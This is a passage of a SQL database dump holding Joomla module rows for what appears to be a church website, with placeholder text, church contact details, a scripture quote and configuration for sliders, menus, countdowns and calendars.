(220, 237, 'Popup C Widget', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit</p>', 1, 'reveal-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colorbox\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(221, 0, 'Popup C Widget', '', '<p>Lorem ipsum dolor sit amet sectetur elit Donec sit amet nibh dolor vivamus non arcu sanctus est penatibus et magnis dis parturient montes consectetur eleifend tempus. Cum sociis natoque penatibus et magnis orem ipsum dolor sit amet sectetur adipiscing elit</p>', 1, 'reveal-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colorbox\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(226, 231, 'Who\'s Online', '', '', 21, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_whosonline', 1, 1, '{\"showmode\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"filter_groups\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(234, 212, 'Dream Centre World Wide', '', '<p>  +(234) 90-90003891</p>\r\n<p><span style=\"text-decoration: underline; color: #ff6600;\">Dream Centre Headquarters</span><br />Km. 4 Gbongan-Osogbo Express Way,<br />Dream Centre Bus stop Osogbo, Nigeria.</p>\r\n<p><span style=\"text-decoration: underline; color: #ff6600;\">Dream Centre United Kingdom</span><br />Please Call +44-7508-782839</p>', 3, 'bottom-c', 196, '2017-12-23 19:00:42', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(248, 295, 'Bottom Menu', '', '', 1, 'bottom-menu', 196, '2017-10-13 23:52:41', '2016-11-01 13:04:08', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 0, '{\"menutype\":\"bottommenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(265, 213, 'Quick Links', '', '', 3, 'bottom-c', 0, '0000-00-00 00:00:00', '2016-11-01 13:04:42', '0000-00-00 00:00:00', 0, 'mod_menu', 1, 1, '{\"menutype\":\"quickmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}', 0, '*'),
(267, 226, 'Dream Centre United Kingdom', '', '<p>Dream Centre United Kingdom<br />Please call: +44-7508-782839</p>', 16, 'sidebar-a', 196, '2018-07-13 05:38:51', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(268, 227, 'Banners', '', '<p><a href=\"resources/pod\"><img src=\"images/podcast.jpg\" alt=\"\" /></a><a href=\"streaming\"><img src=\"images/stream.jpg\" alt=\"\" /></a><a href=\"http://payment.lifeoasisinternationalchurch.org/\" target=\"_blank\" rel=\"noopener noreferrer\"><img src=\"images/giving.png\" alt=\"Online Giving\" /></a><a href=\"resources/downloads?download=5:passion-for-the-lost\"><img src=\"images/evangelism.png\" alt=\"\" /></a></p>', 10, 'sidebar-b', 196, '2018-07-13 05:40:38', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(269, 228, 'Cape Town', '', '<p>Themeforest Plaza<br />Envato Street | Template Drive<br />10th Floor, Site Wing</p>\r\n<p> </p>\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-phone\"] 1 555 000-000[/li]\r\n[li icon=\"icon-envelope-o\"] noreply@arrowthemes.com[/li]\r\n[li icon=\"icon-map-marker\"] Cape Town, South Africa[/li]\r\n[/list]', 17, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(309, 0, 'Slogan-a module', '', '<blockquote>\r\n<p>This is the <strong>Slogan A module position</strong>, Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut sed do eiusmod tempor incididunt ut labore et dolore magna aliqua labore et dolore magna aliqua.</p>\r\n</blockquote>', 1, 'slogan-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"slogan\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(313, 267, 'Small lighthouse logo', '', '<p><a href=\"#\"><img src=\"images/demo/small_logo.png\" alt=\"Lighthouse Joomla Template\" width=\"98\" height=\"29\" /></a></p>', 1, 'bottom-d', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(314, 224, 'rokSprocket Slider', '', '', 1, 'slider', 196, '2019-09-21 10:35:53', '2016-11-01 13:09:00', '0000-00-00 00:00:00', 1, 'mod_roksprocket', 1, 0, '{\"run_content_plugins\":\"onmodule\",\"provider\":\"joomla\",\"layout\":\"features\",\"joomla_articles\":{\"1\":{\"root\":{\"article\":\"126\"}}},\"joomla_filters\":{\"1\":{\"root\":{\"title\":{\"contains\":\"\"}}}},\"joomla_sort\":\"manual\",\"joomla_sort_manual_append\":\"after\",\"display_limit\":\"\\u221e\",\"features_themes\":\"slideshow\",\"features_show_title\":\"0\",\"features_show_article_text\":\"0\",\"features_previews_length\":\"\\u221e\",\"features_strip_html_tags\":\"0\",\"features_show_arrows\":\"show\",\"features_show_pagination\":\"1\",\"features_animation\":\"crossfade\",\"features_autoplay\":\"1\",\"features_autoplay_delay\":\"5\",\"features_resize_enable\":\"0\",\"features_resize_width\":\"0\",\"features_resize_height\":\"0\",\"features_title_default\":\"title\",\"features_description_default\":\"primary\",\"features_image_default\":\"primary\",\"features_image_default_custom\":\"\",\"features_link_default\":\"none\",\"features_link_default_custom\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"module_cache\":\"1\",\"cache_time\":\"900\"}', 0, '*'),
(315, 195, 'Front-page filterable portfolio', '', '', 1, 'mosaic', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_roksprocket', 1, 0, '{\"run_content_plugins\":\"onmodule\",\"provider\":\"joomla\",\"layout\":\"mosaic\",\"joomla_filters\":{\"1\":{\"root\":{\"category\":\"27\"}}},\"joomla_sort\":\"manual\",\"joomla_sort_manual_append\":\"after\",\"joomla_sort_automatic_filters\":{\"1\":{\"root\":{\"title\":\"ascending\"}},\"2\":{\"root\":{\"modifieddate\":\"ascending\"}}},\"joomla_sort_manual_filters\":{\"1\":{\"root\":{\"title\":\"ascending\"}}},\"mosaic_themes\":\"default\",\"display_limit\":\"∞\",\"mosaic_columns\":\"4\",\"mosaic_previews_length\":\"13\",\"mosaic_filter_tags\":\"\",\"mosaic_strip_html_tags\":\"1\",\"mosaic_items_per_page\":\"8\",\"mosaic_article_details\":\"0\",\"mosaic_animations\":[\"fade\",\"scale\"],\"mosaic_ordering\":[\"default\",\"title\",\"date\"],\"mosaic_resize_enable\":\"0\",\"mosaic_resize_width\":\"0\",\"mosaic_resize_height\":\"0\",\"mosaic_title_default\":\"title\",\"mosaic_description_default\":\"primary\",\"mosaic_image_default\":\"none\",\"mosaic_image_default_custom\":\"\",\"mosaic_link_default\":\"primary\",\"mosaic_link_default_custom\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"module_cache\":\"1\",\"cache_time\":\"900\"}', 0, '*'),
(316, 249, 'Accordion List', '', '', 11, 'sidebar-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_roksprocket', 1, 1, '{\"run_content_plugins\":\"onmodule\",\"provider\":\"joomla\",\"layout\":\"lists\",\"joomla_articles\":{\"1\":{\"root\":{\"article\":\"71\"}},\"2\":{\"root\":{\"article\":\"69\"}},\"3\":{\"root\":{\"article\":\"77\"}}},\"joomla_sort\":\"automatic\",\"joomla_sort_manual_append\":\"after\",\"lists_themes\":\"default\",\"display_limit\":\"\\u221e\",\"lists_enable_accordion\":\"1\",\"lists_previews_length\":\"20\",\"lists_strip_html_tags\":\"1\",\"lists_items_per_page\":\"2\",\"lists_show_arrows\":\"show\",\"lists_show_pagination\":\"1\",\"lists_autoplay\":\"0\",\"lists_autoplay_delay\":\"5\",\"lists_resize_enable\":\"0\",\"lists_resize_width\":\"0\",\"lists_resize_height\":\"0\",\"lists_title_default\":\"title\",\"lists_description_default\":\"primary\",\"lists_image_default\":\"primary\",\"lists_image_default_custom\":\"\",\"lists_link_default\":\"primary\",\"lists_link_default_custom\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"module_cache\":\"1\",\"cache_time\":\"900\"}', 0, '*'),
(319, 196, 'Filterable portfolio', '', '', 1, 'mosaic', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_roksprocket', 1, 0, '{\"run_content_plugins\":\"onmodule\",\"provider\":\"joomla\",\"layout\":\"mosaic\",\"joomla_filters\":{\"1\":{\"root\":{\"category\":\"27\"}}},\"joomla_sort\":\"manual\",\"joomla_sort_manual_append\":\"after\",\"joomla_sort_automatic_filters\":{\"1\":{\"root\":{\"title\":\"ascending\"}},\"2\":{\"root\":{\"modifieddate\":\"ascending\"}}},\"mosaic_themes\":\"default\",\"display_limit\":\"∞\",\"mosaic_columns\":\"4\",\"mosaic_previews_length\":\"18\",\"mosaic_filter_tags\":\"\",\"mosaic_strip_html_tags\":\"1\",\"mosaic_items_per_page\":\"8\",\"mosaic_article_details\":\"0\",\"mosaic_animations\":[\"fade\",\"scale\"],\"mosaic_ordering\":[\"default\",\"title\",\"date\",\"random\"],\"mosaic_resize_enable\":\"0\",\"mosaic_resize_width\":\"0\",\"mosaic_resize_height\":\"0\",\"mosaic_title_default\":\"title\",\"mosaic_description_default\":\"primary\",\"mosaic_image_default\":\"primary\",\"mosaic_image_default_custom\":\"\",\"mosaic_link_default\":\"primary\",\"mosaic_link_default_custom\":\"\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"module_cache\":\"1\",\"cache_time\":\"900\"}', 0, '*'),
(322, 0, 'front-page slogan-b', '', '<blockquote>\r\n<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>\r\n</blockquote>', 1, 'slogan-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"slogan\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(328, 0, 'Slogan-b module', '', '<blockquote>\r\n<p>This is the <strong>Slogan B module position</strong>, Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut sed do eiusmod tempor incididunt ut labore et dolore magna aliqua labore et dolore magna aliqua.</p>\r\n</blockquote>', 1, 'slogan-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"slogan\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(329, 0, 'Slider module position', '', '', 1, 'slider', 0, '0000-00-00 00:00:00', '2016-11-01 13:09:53', '0000-00-00 00:00:00', 1, 'mod_widgetkit', 1, 0, '{\"widget_id\":\"20\",\"moduleclass_sfx\":\"\"}', 0, '*'),
(330, 266, 'Bottom-d module', '', '<p>This is the bottom-d module position</p>', 2, 'bottom-d', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(337, 222, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 8, 'sidebar-b', 196, '2017-08-12 15:21:14', '2017-08-12 15:21:43', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(338, 217, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 11, 'sidebar-b', 196, '2017-08-12 15:21:17', '2017-08-12 15:21:43', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(339, 219, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 13, 'sidebar-b', 196, '2017-08-12 15:21:19', '2017-08-12 15:21:43', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(340, 245, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 5, 'sidebar-a', 196, '2017-08-12 15:20:28', '2017-08-12 15:20:58', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(341, 246, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 6, 'sidebar-a', 196, '2017-08-12 15:20:31', '2017-08-12 15:20:58', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(342, 247, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 7, 'sidebar-a', 196, '2017-08-12 15:20:32', '2017-08-12 15:20:58', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(343, 0, 'Utility module', '', '<p style=\"padding-bottom: 20px;\">This is the <strong>utility</strong> module position. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 2, 'utility', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*');
INSERT INTO `y57u5_modules` (`id`, `asset_id`, `title`, `note`, `content`, `ordering`, `position`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `published`, `module`, `access`, `showtitle`, `params`, `client_id`, `language`) VALUES
(344, 293, 'Right Toolbar', '', '<p>Right toolbar position</p>', 1, 'toolbar-r', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 0, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(346, 190, 'Events Countdown', '', '', 1, 'counter', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_jcountdown', 1, 0, '{\"mod_jcountdown_date\":\"07\\/01\\/2018\",\"mod_jcountdown_time\":\"5:00 PM\",\"mod_jcountdown_eventtitle\":\"God of Breakthroughs Convention 2018\",\"mod_tooltip\":\"0\",\"mod_jcountdown_footer\":\"0\",\"mod_jcountdown_finished\":\"<h3>Welcome to God of Breakthroughs Convention 2018<\\/h3>\",\"mod_jcountdown_width\":\"500\",\"mod_jcountdown_height\":\"60\",\"mod_jcountdown_moduletitle\":\"0\",\"mod_jcountdown_introtext\":\" \",\"mod_jcountdown_content\":\"<dl> %%D%% <i> DAYS <\\/i><\\/dl> <dl> %%H%% <i> HOURS <\\/i><\\/dl> <dl> %%M%% <i> MINUTES <\\/i><\\/dl> <dl> %%S%% <i> SECONDS <\\/i><\\/dl>\",\"moduleclass_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(347, 232, 'Calendar Events', '', '', 22, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_jevents_cal', 1, 1, '{\"com_calViewName\":\"global\",\"target_itemid\":\"\",\"modcal_useLocalParam\":\"0\",\"showtooltips\":\"0\",\"noeventcheck\":\"0\",\"ignorecatfilter\":\"0\",\"ignorefiltermodule\":\"0\",\"minical_showlink\":\"1\",\"minical_prevyear\":\"1\",\"minical_prevmonth\":\"1\",\"minical_actmonth\":\"1\",\"minical_actyear\":\"1\",\"minical_nextmonth\":\"1\",\"minical_nextyear\":\"1\",\"minical_usedate\":\"0\",\"modcal_DispLastMonth\":\"NO\",\"modcal_DispLastMonthDays\":\"0\",\"modcal_DispNextMonth\":\"NO\",\"modcal_DispNextMonthDays\":\"0\",\"moduleclass_sfx\":\"\",\"inc_ec_css\":\"1\",\"cache\":\"1\",\"mod_cal_width\":\"\",\"mod_cal_height\":\"\",\"mod_cal_rowheight\":\"\",\"modcal_LinkCloaking\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(348, 233, 'Scripture for the Week', '', '<p>[blockquote author=\"Romans 8:37\"]No, in all these things we are more than conquerors through him who loved us.[/blockquote]</p>\r\n<h1 class=\"m_1455858575066554131gmail-passage-display\" style=\"box-sizing: border-box; font-size: 14px; margin: 0px 0px 20px; font-family: \'Helvetica Neue\', Verdana, Helvetica, Arial, sans-serif; font-weight: 500; line-height: 1.1; color: #000000;\"> </h1>', 1, 'innerbottom-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(349, 214, 'Words from our senior pastors', '', '<p>[row] [column one-half] <img class=\"pic3d-dark uk-align-left uk-margin-small-top uk-margin-right\" src=\"images/demo/avatar/ps_1.png\" width=\"52\" height=\"52\" /></p>\r\n<h4>Ps. Wilson Jones</h4>\r\n<p>Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.</p>\r\n<p>[/column] [column one-half] <img class=\"pic3d-dark uk-align-left uk-margin-small-top uk-margin-right\" src=\"images/demo/avatar/ps_2.png\" width=\"52\" height=\"52\" /></p>\r\n<h4>Ps. Jerry Douglas</h4>\r\n<p>Learn from the past, set vivid, detailed goals for the future, and live in the only moment of time over which you have any control: now</p>\r\n<p>[/column] [/row]</p>', 1, 'innerbottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"mod-color\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(352, 0, 'Ministries', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(354, 198, 'Joomla', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(355, 0, 'Extensions', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(356, 0, 'Blog', '', '<p><img class=\"hidden-img\" src=\"images/demo/blog.png\" border=\"0\" alt=\"\" /></p>', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(357, 286, 'Gallery', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(358, 193, 'Events Calendar', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(359, 317, 'About Us', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(360, 197, 'Media', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
